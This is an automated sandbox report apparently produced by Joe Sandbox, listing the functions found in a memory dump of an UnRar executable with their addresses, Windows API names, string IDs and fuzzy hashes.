                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: memcpy_s
                                                            • String ID:
                                                            • API String ID: 1502251526-0
                                                            • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                            • Instruction ID: 265dd5f864db36e6061261085af2eb6b31a5eeb2e61a2ee5e09fc69b04fc0e6c
                                                            • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                            • Instruction Fuzzy Hash: 67D1D972B1A286C7EB34DF15E18466AF7A1F798744F958134CB9E53B58CA3CE842CB10
                                                            Function 00007FF7AACB4A28 Relevance: 4.8, APIs: 3, Instructions: 253COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: 1a7e6ecabbbe205f99caf5d5c5841753d45d3ae4096109ee06760729a0f725c4
                                                            • Instruction ID: a4dfc988c34fa2e8024c85c0f2f41245cc2b9eb9704cdd9d51c05f113a98a946
                                                            • Opcode Fuzzy Hash: 1a7e6ecabbbe205f99caf5d5c5841753d45d3ae4096109ee06760729a0f725c4
                                                            • Instruction Fuzzy Hash: 1BB1AB73B0AA81CAFB14EB34D4513EEA361EB54344F8145BADBAE476D6DE39E406C310
                                                            Function 00007FF7AACE2350 Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 7cf9afbecfa3e2e1ea380101aa920d9387d1fa4e8b36d214d1f1c233accb25c8
                                                            • Instruction ID: 351eca922f8341316ca0b973744d8e9e70a46c1640caa8bc885b4c4f14063530
                                                            • Opcode Fuzzy Hash: 7cf9afbecfa3e2e1ea380101aa920d9387d1fa4e8b36d214d1f1c233accb25c8
                                                            • Instruction Fuzzy Hash: 81113A72B24A41CEFB109B70E4553BE73B0F74476AF410539DA8956AA8DF3CC149CB54
                                                            Function 00007FF7AACC0C68 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatFreeLastLocalMessage
                                                            • String ID:
                                                            • API String ID: 1365068426-0
                                                            • Opcode ID: 759f128db16c5b60ba6440f41eb12b9c26a107790f12e9b38de639ab2437617c
                                                            • Instruction ID: 361d31d42eb99003dce391ae60681c8aa428c84f2f3ebc55b74ce847222a6633
                                                            • Opcode Fuzzy Hash: 759f128db16c5b60ba6440f41eb12b9c26a107790f12e9b38de639ab2437617c
                                                            • Instruction Fuzzy Hash: 2A017171A09B45D6F7509B22F44017AA2A5FB947E0F415274DABA53AE8CF3CD442C710
                                                            Function 00007FF7AACFF850 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .
                                                            • API String ID: 0-248832578
                                                            • Opcode ID: 3f42f33e8dc5275532eaf6ba69b759467ed7274642d4be3dedc194579eebbddf
                                                            • Instruction ID: c817c10fcc5e91263ed206cb3e6d500207b1add4e7d5608fbeafe5517742fe40
                                                            • Opcode Fuzzy Hash: 3f42f33e8dc5275532eaf6ba69b759467ed7274642d4be3dedc194579eebbddf
                                                            • Instruction Fuzzy Hash: 04312823B1578285F720AB32D8147BDEA91EB85BE4F958235EE6C07BE5CE3CD1028340
                                                            Function 00007FF7AAD05418 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise_clrfp
                                                            • String ID:
                                                            • API String ID: 15204871-0
                                                            • Opcode ID: 53a65d727baae4d4ee09e8a5384e95abe2913edeca406c6b0861453fb1fbba21
                                                            • Instruction ID: 8a8865002c6f895eebafe4096fa69d0156390d2fbb092d095ad68350e461da7b
                                                            • Opcode Fuzzy Hash: 53a65d727baae4d4ee09e8a5384e95abe2913edeca406c6b0861453fb1fbba21
                                                            • Instruction Fuzzy Hash: 86B14873601B84CAEB15CF29C8453687BB0F744B48F55C975DAAE837A8CB39D452C710
                                                            Function 00007FF7AACCB22C Relevance: 3.1, APIs: 2, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: DiskFreeSpace_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 2170103895-0
                                                            • Opcode ID: c8975dbc402fe788990fa28aab437df0892c563c5fc34a269a7ebd0ccbbdeeb9
                                                            • Instruction ID: d1d0ca16e6a3f726208dbf62bc6b7881811cdf295c778025234797673483b86d
                                                            • Opcode Fuzzy Hash: c8975dbc402fe788990fa28aab437df0892c563c5fc34a269a7ebd0ccbbdeeb9
                                                            • Instruction Fuzzy Hash: 1C218D22F15A42C9FB00EFB5D8802AC73B0AB04798F951535DA6D57AA9DF38D582C314
                                                            Function 00007FF7AACD907C Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $%s%s
                                                            • API String ID: 0-4212163154
                                                            • Opcode ID: f00eef5581a6edf15c3fdb1ad8b02ea908420898eb5fa867c687423160b13c1f
                                                            • Instruction ID: 2707dd4640ed20c99bfcda0783459ee6a49c5371ca34cacc66caecf3f4a18a45
                                                            • Opcode Fuzzy Hash: f00eef5581a6edf15c3fdb1ad8b02ea908420898eb5fa867c687423160b13c1f
                                                            • Instruction Fuzzy Hash: 84516E22B0AA42D5FB10FF61D4512FCA361EF94744FC250B6DA0E579AADE2DE50BC360
                                                            Function 00007FF7AACB7730 Relevance: 2.1, Strings: 1, Instructions: 893COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \033'
                                                            • API String ID: 0-3165038308
                                                            • Opcode ID: bdc4d91ceb2a539a0fe2c1dce2336e13b78a5d1b49f7866399f02e7f166df3eb
                                                            • Instruction ID: caccb6b2ee982cd977ea1c83708e921150bafb1d5215ca243b356faa85ec3451
                                                            • Opcode Fuzzy Hash: bdc4d91ceb2a539a0fe2c1dce2336e13b78a5d1b49f7866399f02e7f166df3eb
                                                            • Instruction Fuzzy Hash: D2627E9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314
                                                            Function 00007FF7AACC8930 Relevance: 1.7, APIs: 1, Instructions: 241COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7AACC9FD0: CreateFileW.KERNELBASE ref: 00007FF7AACCA0AB
                                                              • Part of subcall function 00007FF7AACC9FD0: GetLastError.KERNEL32 ref: 00007FF7AACCA0BE
                                                              • Part of subcall function 00007FF7AACC9FD0: CreateFileW.KERNELBASE ref: 00007FF7AACCA11E
                                                              • Part of subcall function 00007FF7AACC9FD0: GetLastError.KERNEL32 ref: 00007FF7AACCA127
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACC8C94
                                                              • Part of subcall function 00007FF7AACCBC5C: MoveFileW.KERNEL32 ref: 00007FF7AACCBC99
                                                              • Part of subcall function 00007FF7AACCBC5C: MoveFileW.KERNEL32 ref: 00007FF7AACCBD10
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 34527147-0
                                                            • Opcode ID: c9b7d347201d604a9d357f8e741d7c58e392641335ca02e971255211994ced22
                                                            • Instruction ID: 43260b69b42326ab7ed5d3a8604cf022ae212b90bb32e8fca217eef40f62b0f5
                                                            • Opcode Fuzzy Hash: c9b7d347201d604a9d357f8e741d7c58e392641335ca02e971255211994ced22
                                                            • Instruction Fuzzy Hash: 1C91B222B1A642C2FA50EF62D4542BEA361FB44BC4F826072EE4D57BA5DE3CD647C310
                                                            Function 00007FF7AACCFDF4 Relevance: 1.7, APIs: 1, Instructions: 208COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 1017591355-0
                                                            • Opcode ID: 8a617dc65c3a6367b1ba8896404b003ad5505829be8874ca3c7e97686f953a6a
                                                            • Instruction ID: b3343281c122c6d30f8fb931d9ff4a239eda5a6e4d3754ca24b5b6f4a7d9eede
                                                            • Opcode Fuzzy Hash: 8a617dc65c3a6367b1ba8896404b003ad5505829be8874ca3c7e97686f953a6a
                                                            • Instruction Fuzzy Hash: A7711311E0F747D1FAA0BB2D941427AD191AF41BD8FD652B5DA5E026E6EF2CF4438320
                                                            Function 00007FF7AACE9B88 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: 28cdd1cac15c1c2b2517891e2cd9340e38c7cd85bd6d5c6e55f9315787835c10
                                                            • Instruction ID: 7fcd59db83b79ea361173ed7bd1e9b2bd9eb83e8fe14c14ffd46ad9b5b62a437
                                                            • Opcode Fuzzy Hash: 28cdd1cac15c1c2b2517891e2cd9340e38c7cd85bd6d5c6e55f9315787835c10
                                                            • Instruction Fuzzy Hash: B251F473A15691C7EB28EF25C44027CF7A1EB94B94F568125DA4D17B98CA3CE842C7A0
                                                            Function 00007FF7AACB72F8 Relevance: 1.5, Strings: 1, Instructions: 294COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \033'
                                                            • API String ID: 0-3165038308
                                                            • Opcode ID: a21ca1895fac5241b577f2dd5a6186eb1309d44fa168ced7e619001d5325b00a
                                                            • Instruction ID: 26413650456918853589b4eef4eef2bc5f7e2ddbbcf2a8f3456d1910a6eb5639
                                                            • Opcode Fuzzy Hash: a21ca1895fac5241b577f2dd5a6186eb1309d44fa168ced7e619001d5325b00a
                                                            • Instruction Fuzzy Hash: 53C18B77B282908FE350CF7AE400AAD7BB1F39878CB515125DF59A3B09D639D645CB40
                                                            Function 00007FF7AACF8400 Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: 0
                                                            • API String ID: 3215553584-4108050209
                                                            • Opcode ID: a92ec3dae37c4c5c2554c1b97b83007307ca6b98fb5db20cc79a3f2c944c64b7
                                                            • Instruction ID: b9dd70bc8c0395c574a74e1e2b2bc47d7d3c98f26986f74541c3939b76acedfe
                                                            • Opcode Fuzzy Hash: a92ec3dae37c4c5c2554c1b97b83007307ca6b98fb5db20cc79a3f2c944c64b7
                                                            • Instruction Fuzzy Hash: 6881F723A1A703C7FEA4AE25846057DA390EF41744FD615B1DD0A876B5CF2DEA47C720
                                                            Function 00007FF7AACF8184 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: 0
                                                            • API String ID: 3215553584-4108050209
                                                            • Opcode ID: 02bac51462a279f7f50c04605fb8a503e133064a26f18778d296118a7c829c93
                                                            • Instruction ID: 95b58818436ae77d77c59d9793ea87fe16d82a6e4b3c087757bd3a2bc272f638
                                                            • Opcode Fuzzy Hash: 02bac51462a279f7f50c04605fb8a503e133064a26f18778d296118a7c829c93
                                                            • Instruction Fuzzy Hash: E871E813B0EB43C6FBA4AA2940602BDD3909B52744FD605B1DE09976B5CF2DFA4B8721
                                                            Function 00007FF7AACFB60C Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: 80a24572311ef4c18b704ec88b624e57f78fc95e3bd166a31bd8b4d10a5d9bcc
                                                            • Instruction ID: 1910a2515e7820c182694734c7448bac97bb4ac82f6dc07ca0108c6404139498
                                                            • Opcode Fuzzy Hash: 80a24572311ef4c18b704ec88b624e57f78fc95e3bd166a31bd8b4d10a5d9bcc
                                                            • Instruction Fuzzy Hash: E541AD62715B45CAFE48EF2AD8241A9A3A1FB48FD4B8A9036DE5D87765DF3CD442C300
                                                            Function 00007FF7AAD00C90 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
